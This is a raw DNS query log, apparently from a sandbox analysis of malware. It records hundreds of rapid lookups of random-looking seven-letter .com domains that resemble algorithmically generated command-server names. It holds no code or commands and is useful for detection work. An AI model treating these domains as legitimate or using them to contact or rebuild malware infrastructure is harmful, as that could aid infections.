                                                                                                                                                                                                          Sep 8, 2024 10:54:22.881680965 CEST192.168.2.91.1.1.10x4d37Standard query (0)ganyqyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.882241964 CEST192.168.2.91.1.1.10x6768Standard query (0)qedysyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.882719994 CEST192.168.2.91.1.1.10xeb3aStandard query (0)pumyliq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.882888079 CEST192.168.2.91.1.1.10xfd07Standard query (0)galynab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.883177042 CEST192.168.2.91.1.1.10xca84Standard query (0)lysysyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.888828039 CEST192.168.2.91.1.1.10xf3cbStandard query (0)purylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.892805099 CEST192.168.2.91.1.1.10xf2bStandard query (0)lyrytod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.897031069 CEST192.168.2.91.1.1.10xf191Standard query (0)qebykul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.898708105 CEST192.168.2.91.1.1.10xf54Standard query (0)vopypec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.899348974 CEST192.168.2.91.1.1.10x6bccStandard query (0)puvyjyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.900688887 CEST192.168.2.91.1.1.10xbdf5Standard query (0)vonyqym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.901015997 CEST192.168.2.91.1.1.10xdd73Standard query (0)pupyxal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.901652098 CEST192.168.2.91.1.1.10x4acdStandard query (0)gahydyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.905900002 CEST192.168.2.91.1.1.10xffb3Standard query (0)gadycew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.939395905 CEST192.168.2.91.1.1.10xbe79Standard query (0)gahyvuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.939821005 CEST192.168.2.91.1.1.10x34bfStandard query (0)puzygop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.940021038 CEST192.168.2.91.1.1.10x8123Standard query (0)qeqyrug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.940211058 CEST192.168.2.91.1.1.10xd834Standard query (0)gaqyrib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.940397978 CEST192.168.2.91.1.1.10x9845Standard query (0)vofycyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.940604925 CEST192.168.2.91.1.1.10x2324Standard query (0)qexyhap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.940758944 CEST192.168.2.91.1.1.10xd700Standard query (0)gacyhez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.940923929 CEST192.168.2.91.1.1.10xae6dStandard query (0)lymywun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.941104889 CEST192.168.2.91.1.1.10xaeb5Standard query (0)vowyrif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.941258907 CEST192.168.2.91.1.1.10xbe8bStandard query (0)vocyjet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.941432953 CEST192.168.2.91.1.1.10x136eStandard query (0)pupypep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.943473101 CEST192.168.2.91.1.1.10x28f4Standard query (0)qekyfiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.943576097 CEST192.168.2.91.1.1.10x2d8bStandard query (0)pumywug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.943682909 CEST192.168.2.91.1.1.10x8a5dStandard query (0)lyxygax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.943814039 CEST192.168.2.91.1.1.10xc2cfStandard query (0)ganykuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.943886042 CEST192.168.2.91.1.1.10x6fd5Standard query (0)lysyxar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.944019079 CEST192.168.2.91.1.1.10xff03Standard query (0)galyfis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.944055080 CEST192.168.2.91.1.1.10x8642Standard query (0)pufycyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.944231033 CEST192.168.2.91.1.1.10xe3eStandard query (0)gaqykus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.944330931 CEST192.168.2.91.1.1.10x6290Standard query (0)qetytav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.944401979 CEST192.168.2.91.1.1.10x3f85Standard query (0)lyvyjyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.944535017 CEST192.168.2.91.1.1.10xd445Standard query (0)vojybim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.944566965 CEST192.168.2.91.1.1.10xb47bStandard query (0)qegyvuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.944749117 CEST192.168.2.91.1.1.10xc239Standard query (0)lyrylix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.944807053 CEST192.168.2.91.1.1.10x37c6Standard query (0)pujybig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.947560072 CEST192.168.2.91.1.1.10xe9b5Standard query (0)vocymak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.947560072 CEST192.168.2.91.1.1.10xbffbStandard query (0)purytov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.947560072 CEST192.168.2.91.1.1.10xa465Standard query (0)vonykuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.947560072 CEST192.168.2.91.1.1.10xcfc2Standard query (0)qegysyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.947560072 CEST192.168.2.91.1.1.10xfba0Standard query (0)gatypas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.947560072 CEST192.168.2.91.1.1.10x5e38Standard query (0)volygoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.948402882 CEST192.168.2.91.1.1.10x490bStandard query (0)qedyxel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.948575974 CEST192.168.2.91.1.1.10xb6b9Standard query (0)qekynog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.949196100 CEST192.168.2.91.1.1.10x2abbStandard query (0)qetylip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.969156027 CEST192.168.2.91.1.1.10xb459Standard query (0)qexynol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.969216108 CEST192.168.2.91.1.1.10x3c2aStandard query (0)pufypeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.981667995 CEST192.168.2.91.1.1.10xa278Standard query (0)vowykuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.981993914 CEST192.168.2.91.1.1.10xb8a6Standard query (0)gacynow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.984050035 CEST192.168.2.91.1.1.10x8306Standard query (0)lygysen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.679255009 CEST192.168.2.91.1.1.10xba67Standard query (0)qedytoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.679488897 CEST192.168.2.91.1.1.10xf4f3Standard query (0)pumyjev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.679899931 CEST192.168.2.91.1.1.10xd427Standard query (0)qegytop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.681588888 CEST192.168.2.91.1.1.10x26b6Standard query (0)puryjeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.682924986 CEST192.168.2.91.1.1.10x867aStandard query (0)lyryjej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.687570095 CEST192.168.2.91.1.1.10xd7acStandard query (0)gahypoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.690984964 CEST192.168.2.91.1.1.10x967dStandard query (0)puvybuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.720184088 CEST192.168.2.91.1.1.10x4521Standard query (0)vocybuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.721533060 CEST192.168.2.91.1.1.10xe62fStandard query (0)qetykyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.721863031 CEST192.168.2.91.1.1.10x6ad7Standard query (0)vojypat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.722013950 CEST192.168.2.91.1.1.10x693Standard query (0)gatykyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.722323895 CEST192.168.2.91.1.1.10x2fbStandard query (0)pujypal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.722503901 CEST192.168.2.91.1.1.10x307cStandard query (0)vopykum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.722660065 CEST192.168.2.91.1.1.10xc566Standard query (0)qebyniv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.722835064 CEST192.168.2.91.1.1.10x2670Standard query (0)lykyser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.723068953 CEST192.168.2.91.1.1.10xe449Standard query (0)qekysel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.723331928 CEST192.168.2.91.1.1.10x9d45Standard query (0)pupylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.723503113 CEST192.168.2.91.1.1.10x9e62Standard query (0)lyxynir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.723648071 CEST192.168.2.91.1.1.10x1c0eStandard query (0)lymyjyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.723799944 CEST192.168.2.91.1.1.10xc18aStandard query (0)puzybil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.723956108 CEST192.168.2.91.1.1.10x3233Standard query (0)vofypam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.724111080 CEST192.168.2.91.1.1.10xfe59Standard query (0)qeqykyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.724301100 CEST192.168.2.91.1.1.10x3b48Standard query (0)gadypah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.724427938 CEST192.168.2.91.1.1.10x3b30Standard query (0)volybut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.758277893 CEST192.168.2.91.1.1.10xca4cStandard query (0)pumymap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.764740944 CEST192.168.2.91.1.1.10x1675Standard query (0)pufyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.764839888 CEST192.168.2.91.1.1.10x1b7fStandard query (0)lygyxad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.764955044 CEST192.168.2.91.1.1.10x8109Standard query (0)lyxyfuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.766154051 CEST192.168.2.91.1.1.10x70beStandard query (0)vofyzof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.766325951 CEST192.168.2.91.1.1.10xbcb6Standard query (0)vonymoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.766587019 CEST192.168.2.91.1.1.10x6a3aStandard query (0)gadyzib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.768960953 CEST192.168.2.91.1.1.10xb363Standard query (0)gaqyqez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.769350052 CEST192.168.2.91.1.1.10x8e1cStandard query (0)volydyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.772747993 CEST192.168.2.91.1.1.10x839dStandard query (0)galydyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.772804022 CEST192.168.2.91.1.1.10x7ebbStandard query (0)gacyfih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.773153067 CEST192.168.2.91.1.1.10xed3dStandard query (0)lyvynid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.773695946 CEST192.168.2.91.1.1.10x5fa2Standard query (0)qedylig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.773818970 CEST192.168.2.91.1.1.10xe2afStandard query (0)lysylun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.774208069 CEST192.168.2.91.1.1.10x4582Standard query (0)lyrywur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.774662971 CEST192.168.2.91.1.1.10x8d57Standard query (0)puzyduq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.776242018 CEST192.168.2.91.1.1.10xb3bfStandard query (0)purywyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.777790070 CEST192.168.2.91.1.1.10xaa92Standard query (0)ganynos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.777882099 CEST192.168.2.91.1.1.10x7537Standard query (0)qeqyqep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.778239965 CEST192.168.2.91.1.1.10xf157Standard query (0)qegyxav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.878438950 CEST192.168.2.91.1.1.10x20f3Standard query (0)galyvuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.878767967 CEST192.168.2.91.1.1.10xccfdStandard query (0)lysytoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.878977060 CEST192.168.2.91.1.1.10x74d8Standard query (0)qexyfuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.879194021 CEST192.168.2.91.1.1.10x51caStandard query (0)lykyvyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.879345894 CEST192.168.2.91.1.1.10xc4dcStandard query (0)vonyjef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.879494905 CEST192.168.2.91.1.1.10xcb59Standard query (0)pupytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.879686117 CEST192.168.2.91.1.1.10xbb46Standard query (0)vopyrik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.880186081 CEST192.168.2.91.1.1.10xbbbbStandard query (0)ganyhab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.880460024 CEST192.168.2.91.1.1.10x4ed9Standard query (0)qebyhag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.881139994 CEST192.168.2.91.1.1.10x33c8Standard query (0)gatyruw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.881320000 CEST192.168.2.91.1.1.10x6ab2Standard query (0)qetyrul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.881470919 CEST192.168.2.91.1.1.10x4940Standard query (0)vojycec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.881617069 CEST192.168.2.91.1.1.10x47f5Standard query (0)puvygog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.881752968 CEST192.168.2.91.1.1.10x9689Standard query (0)vowyqyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.881912947 CEST192.168.2.91.1.1.10x59bfStandard query (0)lymymax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.882067919 CEST192.168.2.91.1.1.10xc4c0Standard query (0)vocygim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.882215977 CEST192.168.2.91.1.1.10x8eb0Standard query (0)gahyces.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.884020090 CEST192.168.2.91.1.1.10x34ccStandard query (0)lyvygon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.884453058 CEST192.168.2.91.1.1.10x5e48Standard query (0)qekyvup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:24.191589117 CEST192.168.2.91.1.1.10x2b70Standard query (0)pujycyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.309174061 CEST192.168.2.91.1.1.10x50abStandard query (0)gacyvub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.313591957 CEST192.168.2.91.1.1.10xc2f9Standard query (0)qexyvyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.315854073 CEST192.168.2.91.1.1.10xcd10Standard query (0)lyxyvyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.317485094 CEST192.168.2.91.1.1.10x64edStandard query (0)vofyruc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.318073988 CEST192.168.2.91.1.1.10xa187Standard query (0)qeqyhol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.321274042 CEST192.168.2.91.1.1.10xf295Standard query (0)puzyceg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.322721958 CEST192.168.2.91.1.1.10x57aStandard query (0)gadyrus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.327919006 CEST192.168.2.91.1.1.10x63c8Standard query (0)lymygor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.341270924 CEST192.168.2.91.1.1.10x8b0aStandard query (0)volycem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.341455936 CEST192.168.2.91.1.1.10xf925Standard query (0)qedyruv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.341730118 CEST192.168.2.91.1.1.10xfd5cStandard query (0)pumygil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.341916084 CEST192.168.2.91.1.1.10x9bd9Standard query (0)galycah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.353703976 CEST192.168.2.91.1.1.10xb8daStandard query (0)qekyxaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.357172012 CEST192.168.2.91.1.1.10x8468Standard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.360814095 CEST192.168.2.91.1.1.10x93f5Standard query (0)gacydes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.361223936 CEST192.168.2.91.1.1.10x23bdStandard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.362529993 CEST192.168.2.91.1.1.10xb454Standard query (0)gatyqeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.362848043 CEST192.168.2.91.1.1.10xddeeStandard query (0)gaqynih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.364397049 CEST192.168.2.91.1.1.10x5c07Standard query (0)pufylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.364737988 CEST192.168.2.91.1.1.10x2221Standard query (0)lyxysad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.375216007 CEST192.168.2.91.1.1.10x57Standard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.375968933 CEST192.168.2.91.1.1.10x163dStandard query (0)qeqyniq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.376486063 CEST192.168.2.91.1.1.10x4946Standard query (0)puzypav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.667465925 CEST192.168.2.91.1.1.10x8024Standard query (0)gaqyhaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.669296980 CEST192.168.2.91.1.1.10xcfcaStandard query (0)gadykyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.670372009 CEST192.168.2.91.1.1.10xf186Standard query (0)volypof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.670989990 CEST192.168.2.91.1.1.10xedecStandard query (0)pumybuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.671566963 CEST192.168.2.91.1.1.10x7cbcStandard query (0)galypob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.671844006 CEST192.168.2.91.1.1.10x98f4Standard query (0)lysyjex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.672167063 CEST192.168.2.91.1.1.10xe97bStandard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.672590017 CEST192.168.2.91.1.1.10x5855Standard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.672784090 CEST192.168.2.91.1.1.10xe794Standard query (0)lymynuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.673110962 CEST192.168.2.91.1.1.10x163dStandard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.673624992 CEST192.168.2.91.1.1.10x9123Standard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.673907995 CEST192.168.2.91.1.1.10x2282Standard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.674392939 CEST192.168.2.91.1.1.10x6426Standard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.674808979 CEST192.168.2.91.1.1.10x4d18Standard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.674912930 CEST192.168.2.91.1.1.10xbb24Standard query (0)lygylur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.675606966 CEST192.168.2.91.1.1.10xa463Standard query (0)vocydyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.676078081 CEST192.168.2.91.1.1.10xa818Standard query (0)purymog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.676600933 CEST192.168.2.91.1.1.10x7923Standard query (0)qegylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.677118063 CEST192.168.2.91.1.1.10x8cbfStandard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.677392006 CEST192.168.2.91.1.1.10x2d98Standard query (0)gahyziw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.677911997 CEST192.168.2.91.1.1.10x8d92Standard query (0)qetyqag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.681274891 CEST192.168.2.91.1.1.10x3e17Standard query (0)lykyxoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.681480885 CEST192.168.2.91.1.1.10xdedeStandard query (0)pujyxoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.693245888 CEST192.168.2.91.1.1.10x1f3Standard query (0)pupywyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.693540096 CEST192.168.2.91.1.1.10x8221Standard query (0)lyryman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.693674088 CEST192.168.2.91.1.1.10x1851Standard query (0)vopyqef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.693842888 CEST192.168.2.91.1.1.10x1068Standard query (0)puvydyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.696754932 CEST192.168.2.91.1.1.10xe3bbStandard query (0)lysywyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.696784019 CEST192.168.2.91.1.1.10x90f5Standard query (0)ganyfuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.696958065 CEST192.168.2.91.1.1.10xc30aStandard query (0)vojyzik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.697433949 CEST192.168.2.91.1.1.10xf161Standard query (0)lygytix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.697508097 CEST192.168.2.91.1.1.10x5870Standard query (0)vonygit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.713692904 CEST192.168.2.91.1.1.10x1c06Standard query (0)vofykyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.714699984 CEST192.168.2.91.1.1.10x1398Standard query (0)pufytip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.714919090 CEST192.168.2.91.1.1.10x7db5Standard query (0)qebyfup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.715066910 CEST192.168.2.91.1.1.10xf04dStandard query (0)vowyjak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.717459917 CEST192.168.2.91.1.1.10xe935Standard query (0)vowymom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.724668026 CEST192.168.2.91.1.1.10x4603Standard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.725447893 CEST192.168.2.91.1.1.10x51c1Standard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.736449003 CEST192.168.2.91.1.1.10x66aeStandard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.736751080 CEST192.168.2.91.1.1.10xe224Standard query (0)qetyhov.comA (IP address)IN (0x0001)false
